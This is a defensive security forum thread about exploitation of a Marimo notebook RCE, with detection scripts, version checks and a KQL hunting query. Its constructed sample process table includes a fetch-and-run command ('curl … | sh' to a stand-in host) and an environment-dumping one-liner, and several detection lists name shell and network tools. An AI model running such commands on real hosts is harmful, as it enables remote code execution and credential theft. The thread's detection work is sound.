
Marimo Pre-Auth RCE: Active Exploitation & Credential Theft

MSP_Owner_Rachel (4/12/2026)

Just caught the BleepingComputer report regarding the critical pre-authentication RCE in Marimo (CVE-2025-31115). It looks like threat actors are actively exploiting this to steal credentials, likely targeting exposed instances used for data science workflows.

Since Marimo notebooks execute Python code, an unauthenticated RCE is essentially a game-over for that container/host. The report indicates attackers are using the access to scrape environment variables and cloud keys.

Immediate Action Items:

  • Patch immediately: Ensure you are running the latest version.
  • Network Segmentation: Do not expose Marimo instances directly to the public internet. Put them behind a VPN or Auth proxy.

If you suspect you might be compromised, check for suspicious parent-child process relationships. The exploit spawns a shell, so look for Python processes spawning /bin/sh or curl.

# Check for unexpected shell or network-tool processes spawned by the marimo runtime
# (-w matches whole words, so "sh" no longer matches sshd, flush, etc.)
ps aux --forest | grep -A 5 "marimo" | grep -Ew "sh|bash|dash|curl|wget|python.*-c"

Also, keep an eye on your egress traffic. If the notebook server is suddenly phoning home to unknown IPs, it's too late.

How is everyone else securing notebook interfaces like Jupyter or Marimo? Are you relying on WAFs, or are you strictly enforcing VPN-only access for data science teams?
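Added example for this thread (not code from the original post or from the marimo project): the parent-child check above, done over `ps -eo pid,ppid,comm,args` output so that it also catches grandchildren (a shell that in turn launches curl) and inline `python -c` one-liners. The SAMPLE_PS process table is constructed; `live_ps()` shows how to capture the real one on a Linux host.

```python
"""Flag shells and network tools running underneath a marimo server.

Added example for this thread, not code from the original post or from the
marimo project. It reads `ps -eo pid,ppid,comm,args` style output; the
SAMPLE_PS block below is constructed and stands in for a real process table.
"""
import re
import subprocess
from typing import Dict, List, Set, Tuple

# Constructed sample: a marimo server (pid 4242) with one benign worker and
# two suspicious children, one of which itself spawns curl.
SAMPLE_PS = """\
  PID  PPID COMMAND         COMMAND
    1     0 systemd         /sbin/init
 4242     1 python3         /usr/bin/python3 -m marimo edit --headless --port 2718
 4300  4242 sh              /bin/sh -c curl http://example.invalid/x.sh | sh
 4301  4300 curl            curl http://example.invalid/x.sh
 4310  4242 python3         /usr/bin/python3 -c import os;print(sorted(os.environ))
 4400  4242 python3         /usr/bin/python3 /opt/jobs/etl.py
 5000     1 sshd            /usr/sbin/sshd -D
"""

PS_LINE = re.compile(r"^\s*(\d+)\s+(\d+)\s+(\S+)\s+(.*)$")
# Process names a notebook kernel has no business spawning.
SUSPICIOUS_COMMS = {"sh", "bash", "dash", "zsh", "curl", "wget", "nc", "ncat"}
# Inline "python -c ..." is the other common way to run code outside the notebook.
INLINE_PYTHON = re.compile(r"\bpython[0-9.]*(\s+\S+)*\s+-c\s")

Proc = Tuple[int, str, str]  # (ppid, comm, args)


def parse_ps(text: str) -> Dict[int, Proc]:
    """Map pid -> (ppid, comm, args); the header line does not match and is skipped."""
    procs: Dict[int, Proc] = {}
    for line in text.splitlines():
        m = PS_LINE.match(line)
        if m:
            pid, ppid, comm, args = m.groups()
            procs[int(pid)] = (int(ppid), comm, args)
    return procs


def marimo_descendants(procs: Dict[int, Proc]) -> Set[int]:
    """All pids transitively below any process whose command line mentions marimo."""
    roots = {pid for pid, (_, _, args) in procs.items() if "marimo" in args}
    found: Set[int] = set()
    changed = True
    while changed:  # iterate until no new descendant is discovered
        changed = False
        for pid, (ppid, _, _) in procs.items():
            if pid not in roots and pid not in found and (ppid in roots or ppid in found):
                found.add(pid)
                changed = True
    return found


def find_suspicious_children(text: str) -> List[Tuple[int, int, str, str]]:
    """Return (pid, ppid, comm, args) for every suspicious descendant of a marimo process."""
    procs = parse_ps(text)
    hits = []
    for pid in sorted(marimo_descendants(procs)):
        ppid, comm, args = procs[pid]
        if comm in SUSPICIOUS_COMMS or INLINE_PYTHON.search(args):
            hits.append((pid, ppid, comm, args))
    return hits


def live_ps() -> str:
    """Capture the real process table on a Linux host (not used by the sample run)."""
    return subprocess.run(["ps", "-eo", "pid,ppid,comm,args"], check=True,
                          capture_output=True, text=True).stdout


if __name__ == "__main__":
    for pid, ppid, comm, args in find_suspicious_children(SAMPLE_PS):
        print(f"SUSPICIOUS pid={pid} ppid={ppid} comm={comm} args={args}")
```

On the sample table this reports pids 4300, 4301 and 4310 and stays quiet about the ETL worker (4400) and sshd. Swap `SAMPLE_PS` for `live_ps()` to run it against a host; walking descendants rather than direct children matters because the first thing a dropped shell usually does is spawn something else.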

MasterSlacker (4/12/2026)

We actually found a few instances running in our dev environment during our last asset inventory. We've moved to a 'deny-by-default' egress policy for these containers. If a notebook needs to pull data, it has to go through a specific internal proxy.

Here is a quick Python snippet to check the installed Marimo version if you are managing dependencies via pip:

# importlib.metadata is the stdlib replacement for the deprecated pkg_resources API
from importlib.metadata import PackageNotFoundError, version

try:
    print(f"Installed Marimo version: {version('marimo')}")
except PackageNotFoundError:
    print("Marimo not found in this environment.")

Make sure you verify the patched version against the advisory.

EDR_Engineer_Raj (4/12/2026)

As a pentester, I see these notebook tools exposed way too often. Developers love the convenience, but they often forget that root or a service account inside the container is a massive prize.

From a detection standpoint, if you have EDR on those nodes, look for sys.modules tampering or unexpected imports in the Python interpreter logs. The initial exploit usually involves importing os or subprocess in a way that deviates from the notebook's saved state.
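Added example for this thread (not code from the original post or from the marimo project): one way to put "deviates from the notebook's saved state" into practice. It extracts the top-level imports from the notebook file on disk with `ast` and diffs them against each cell body the server is asked to run, flagging any module that is new and in a sensitive set. The saved notebook and the three submitted cells are constructed; in a real deployment the submitted code would come from the server's execution log or an audit wrapper around cell execution.

```python
"""Diff the imports in a marimo notebook's saved source against the code the
server is asked to execute.

Added example for this thread, not code from the original post or from the
marimo project. The notebook source and the three "submitted cells" below are
constructed; in a real deployment the submitted code would come from the
server's execution log or an audit wrapper around cell execution.
"""
import ast
from typing import Dict, Set

# Constructed marimo-style notebook as saved on disk: cells are functions
# decorated with @app.cell and every import lives inside a cell body.
SAVED_NOTEBOOK = '''
import marimo

app = marimo.App()


@app.cell
def _():
    import pandas as pd
    import numpy as np
    return np, pd


@app.cell
def _(pd):
    df = pd.DataFrame({"x": [1, 2, 3]})
    return (df,)


if __name__ == "__main__":
    app.run()
'''

# Constructed cell bodies as they would arrive at the server at run time.
SUBMITTED_CELLS = [
    "df = pd.DataFrame({'x': [1, 2, 3]})\ndf.describe()",  # matches the saved state
    "import subprocess\nimport os\ns = __import__('socket')\nprint(sorted(os.environ))",  # deviates
    "import requests\nrequests.get('https://example.invalid/health')",  # new, not sensitive
]

# Modules whose first appearance in a cell deserves an alert on a notebook host.
SENSITIVE_MODULES = {"os", "subprocess", "socket", "ctypes", "pty", "shutil", "importlib"}


def top_level_imports(source: str) -> Set[str]:
    """Top-level package names imported anywhere in `source`, including nested
    function bodies and string-literal calls to __import__ / importlib.import_module."""
    names: Set[str] = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
        elif isinstance(node, ast.Call):
            func = node.func
            dynamic = (isinstance(func, ast.Name) and func.id == "__import__") or (
                isinstance(func, ast.Attribute) and func.attr == "import_module")
            if dynamic and node.args and isinstance(node.args[0], ast.Constant) \
                    and isinstance(node.args[0].value, str):
                names.add(node.args[0].value.split(".")[0])
    return names


def import_deviations(saved_source: str, submitted_code: str) -> Dict[str, object]:
    """Imports present in the submitted code but absent from the saved notebook."""
    try:
        submitted = top_level_imports(submitted_code)
    except SyntaxError:
        # Unparseable code cannot be vetted; surface it rather than silently passing it.
        return {"new": [], "sensitive": [], "unparseable": True}
    new = submitted - top_level_imports(saved_source)
    return {"new": sorted(new), "sensitive": sorted(new & SENSITIVE_MODULES), "unparseable": False}


if __name__ == "__main__":
    for i, code in enumerate(SUBMITTED_CELLS):
        print(f"cell {i}: {import_deviations(SAVED_NOTEBOOK, code)}")
```

The diff is done on source rather than on `sys.modules` on purpose: pandas alone pulls in `os`, `subprocess` and `socket` transitively, so the interpreter's module table is always "tampered" by that measure and gives no usable baseline. Unparseable submissions are reported rather than ignored, since a cell the checker cannot read is exactly the one an analyst should look at.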

PatchTuesday_Sam (4/12/2026)

Spotting the exploitation attempts is key since patch cycles might lag in dev environments. Watch for the Marimo process spawning unexpected shells or network tools. This KQL query helps identify those suspicious parent-child relationships:

// Defender XDR advanced hunting schema: DeviceProcessEvents replaced the older ProcessCreationEvents table
DeviceProcessEvents
| where InitiatingProcessCommandLine contains "marimo"
| where FileName in~ ("curl", "wget", "bash", "sh", "dash", "nc", "powershell")
| project Timestamp, DeviceName, InitiatingProcessCommandLine, FileName, ProcessCommandLine

Also, verify if your API gateways are dropping specific path traversals if you can't patch immediately.
